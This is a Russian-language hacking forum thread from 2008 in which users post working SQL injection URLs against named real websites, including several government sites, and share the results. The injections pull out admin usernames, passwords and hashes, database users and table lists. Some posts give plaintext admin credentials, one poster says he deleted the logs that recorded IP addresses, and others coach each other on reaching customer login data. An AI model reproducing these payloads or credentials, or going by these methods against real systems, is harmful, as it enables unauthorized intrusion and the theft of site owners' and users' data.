SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+users+limit+2,1/*


    login:brianficek
    pass:85688717ef4fab9 mb md5 64 bit?
     
  2. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Список БД
    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/*

    БД jos_users
    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x6a6f735f7573657273/*
    немогу данный просматреть :(

    БД phpbb_users
    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x70687062625f7573657273/*

    И опять же не могу просмотреть :(
    P.S я делаю вот так http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_users+limit+1,1--

    Скажите в чем проблема?
     
  3. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0

    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,username,5,6,7+from+db4514a.phpbb_users/*

    нужно указывать и название базы
     
    1 person likes this.
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    ЛОГИН:Anton
    Пароль:majestic

    http://www.devchatnik.ru

    СКУЛЬ (http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,concat_ws(0x3a,users_login,users_password),5,6,7+from+xz_users/*)

    P.S я удалил админские логи которые записывали IP
     
    1 person likes this.
  5. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Я е..л и плакал...

    http://vli-info.ru/index.php?p=show_cont&parent_id=-1+union+select+1,2,3,concat(login,0x3a3a,password,0x3a3a,admin),5,6,7+from+users+limit+0,1

    login: admin pass:1q2w3e4r

    http://vli-info.ru/index.php?p=login

    Тематика сайта и факт взлома заставили меня немного прслезиться...
     
    1 person likes this.
  6. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.bohnespring.ca/page.php?ID=4+union+select+1,2,user(),version(),5++limit+1,1/*

    [email protected]
    4.0.27-standard-log
     
  7. lastsmile

    lastsmile Elder - Старейшина

    Joined:
    22 Sep 2007
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    http://www.michaelpollan.com/article.php?id=-1+union+select+1,version(),database(),4,5,6,user(),8,9,0+from+articles/*

    4.1.22-standard
    pollan_articles
    pollan_article@localhost
     
  8. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Dbname: stjohns
    Version: 4.1.20
    User: [email protected]
     
  9. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.iped.com/cm.php?id=-38'+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+iped.user+limit+1,1/*
     
  10. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://wmbuy.info/index.php?gid=-1+union+select+concat(0x3a3a,login,0x3a3a,password)+from+users+limit+1,1

    login:admin pass:ffffff
     
  11. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://fashion1001nights.net/productdetail.php?catId=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3/*

    Code:
    http://www.compel.com.tr/Include/Modules/ProductDetail.php?CatID=-1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*
     
  12. errsec

    errsec New Member

    Joined:
    28 Aug 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Hacked By Errsec

    На счёт темы про Грузию. Сайт парламента Грузии

    ПРОСТЕЙШАЯ дырка, ппц


    http://www.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-20026+UNION+SELECT+1,2,3,4,5,6,7,password,9,10,11,12,13+FROM+users--

    user: dato@localhost
    version: 5.0.51a-log


    db: parliament
    db: users


    55e9a83d8533e24df2a3d444aedb48e8

    login: vivageodea
    pass: eannia


    http://www.parliament.ge/admin/
    доступ по IP , .htaccess

    кто пройдёт дальше, отпишите плз
     
    #6452 errsec, 29 Aug 2008
    Last edited: 29 Aug 2008
  13. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://imperialove.ru/main/index.html?id=102&parent_id=-1+union+select+1,2,3,4,5,concat(0x3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a,user_login,0x3a3a,user_password),7,8+from+sys_users+limit+1,1

    http://imperialove.ru/admin

    login:admin pass:Ximper2ia

    Зы:2 geforse С вопросами в тему 'Ваши вопросы по узвимостям'!!!!
     
    1 person likes this.
  14. paulzey

    paulzey Elder - Старейшина

    Joined:
    30 Oct 2007
    Messages:
    52
    Likes Received:
    16
    Reputations:
    5
    Code:
    http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),%20database()),10/*
    olympicwatch_org_db@localhost:4.0.22:olympicwatch_org_db
    
    + раскрытие пути Warning: getimagesize(): Unable to access ./img/img_php/1_obrazek1.8 in /domains3/olympicwatch-org/ftp/www_root/news.php on line 67

    + есть таблица users
    http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,id,5,6,7,8,user,10+from+users/*
    1
    olympicwatch-admin

    Точно названия поля с хэшем подобрать не получилось, пришлось выдирать через хитрую задницу
    http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1,2,3,4,5,6,7+from+users/*
    затем, хитрый join три раза, поскольку поля лежали в не выводимых областях
    http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1+from+users+join+users+u+join+users+b/*

    Хэш:f0b16007c9541482261c66376e8eaf03
    Подобрать не удалось, точный алгоритм не установлен. С учётом того, что в users три поля, соли там (скорее всего) нет.
    Ничего особо интересного найти не удалось. :(
     
    1 person likes this.
  15. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.termal.gov.tr/portal/modules/articles/article.php?id=1%20UNION%20SELECT%201,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

     
  16. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    Вот несколько вкусных скулей от меня ;)

    Code:
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    iletisim (Id)
    kullanici_log
    kullanicilar(ID, kullanici, sifre)
    kurul_uyeler
    kurullar 
    sayfa_icerik (KatID)
    sayfalar (ID, sayfa_id, kullanici_id, sira, sayfa_adi, sayfa_adres, ust_id)
    smf_members(ID_MEMBER, memberName, lngfile, passwd, ICQ, AIM, YIM, MSN  )
    smf_moderators 
    urun 
    
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x696C65746973696D+limit+7,1/*
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID,0x3a,kullanici,0x3a,sifre),6,7,8,9,10,11,12,13+from+kullanicilar+limit+0,1/*
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID_MEMBER,0x3a,memberName,0x3a,passwd,0x3a,ICQ),6,7,8,9,10,11,12,13+from+smf_members+limit+0,1/*
    
    Code:
    http://www.newportky.gov/inner_main.php?secid=-149+UNION+SELECT+concat(username,0x3a,password),2+from+users+limit+0,1/*
    Code:
    http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,concat(username,0x3a,password),3+from+login/*,password),2+from+users/*
    http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,2,3+from+mysql.user/*
    Code:
    http://www.president.mn/show_module.php?index=speech&speechid=-214+UNION+SELECT+1,concat(userid,0x3a,username,0x3a,loginname,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*
    
    Code:
    http://banten.go.id/?link=dtl&id=-2076+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
    Code:
    http://www.lincoln.gov.ar/index.php?seccion_generica_id=-36+UNION+SELECT+1,column_name,3+from+information_schema.columns++where+table_name=0x5553554152494F53+limit+23,1/*
    USUARIOS (USUARIO_ID, CLAVE, APELLIDO_NOMBRE, CIUDAD, ACCESO_ADMIN, PAIS...)

    Code:
    http://www.ondostate.gov.ng/news_details.php?id=-1741+UNION+SELECT+1,concat(id,0x3a,username,0x3a,password),3+from+admin+limit+0,1/*
     
    1 person likes this.
  17. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://www.zaistinu.ru/articles/?sid=-29+union+select+version()
    version() - 5.0.32-Debian_7etch6-log
    user() - [email protected]
    database() - zaistinu_0001

    http://alterego.tut.by/library/showarticle.php?id=55+union+select+1,user(),version(),database(),5,6
    version() - 4.0.27-log
    user() - [email protected]
    database() - alteregotutby
     
  18. Shadow_p1raT

    Shadow_p1raT Elder - Старейшина

    Joined:
    9 Mar 2008
    Messages:
    174
    Likes Received:
    93
    Reputations:
    0
    Cайт: clas.ru
    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_Ws(0x3a,database(),version(),user()),5,6,7,8--
    User:u8122(sobaka)10.10.223.235
    Version:5.0.45-log
    Database:u8122_1gb_clas
    Таблички:
    Code:
    bag
    buyers
    c_fields
    c_order_fields
    c_order_items
    c_orders
    colors
    comments
    companies
    counter
    countries
    deliveries
    delivery_fields
    delivery_paids
    distributors
    fasons
    genres
    groups
    ids
    kath
    links
    media
    messages
    movies
    news
    news_items
    opinions
    orderpositions
    orders
    paids
    people
    pic
    pic_any
    presence
    recences
    screensizes
    shirtmodels
    shirts
    shirtsgroup
    sizes
    staff
    staff_types
    subscribers
    t_dostavka
    t_news
    t_oplata
    t_rasskaz
    t_users
    texts
    translations
    users
    vote_details
    vote_items
    vote_list
    votes
    wanted
    book_wanted
    
    Дальше не смог докопать,пошёл спать:(
     
    1 person likes this.
  19. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Мм... поможем :)

    Просматриваем таблицу t_users лимитом
    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x745f7573657273+limit+0,1--
    Видим интересные поля: id, pass... Также адреса, телефоны, IP-адреса и т.д. Кароч хорошая БД.

    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(id,0x3a,pass),5,6,7,8+from+t_users--
    Эмм, логина не нашел. Идем в buyers.
    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(login,0x3a,pass),5,6,7,8+from+buyers+limit+1,1--
    И вот и пошли логины с пассами :)
     
    #6459 USAkid, 30 Aug 2008
    Last edited: 30 Aug 2008
    1 person likes this.
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.terranita.ro/int/index.php?req=catalog&src=-10'+UNION+SELECT+1,2,table_name+from+information_schema.tables+limit+1,1/*&zid=1

    Database Version: 5.0.26
    Database name: terranita_facelift
    User name: terranita_user@localhost




    http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10/*

    Database Version: 5.0.26
    Database name: lobont1
    User name: lobont@localhost
     
Thread Status:
Not open for further replies.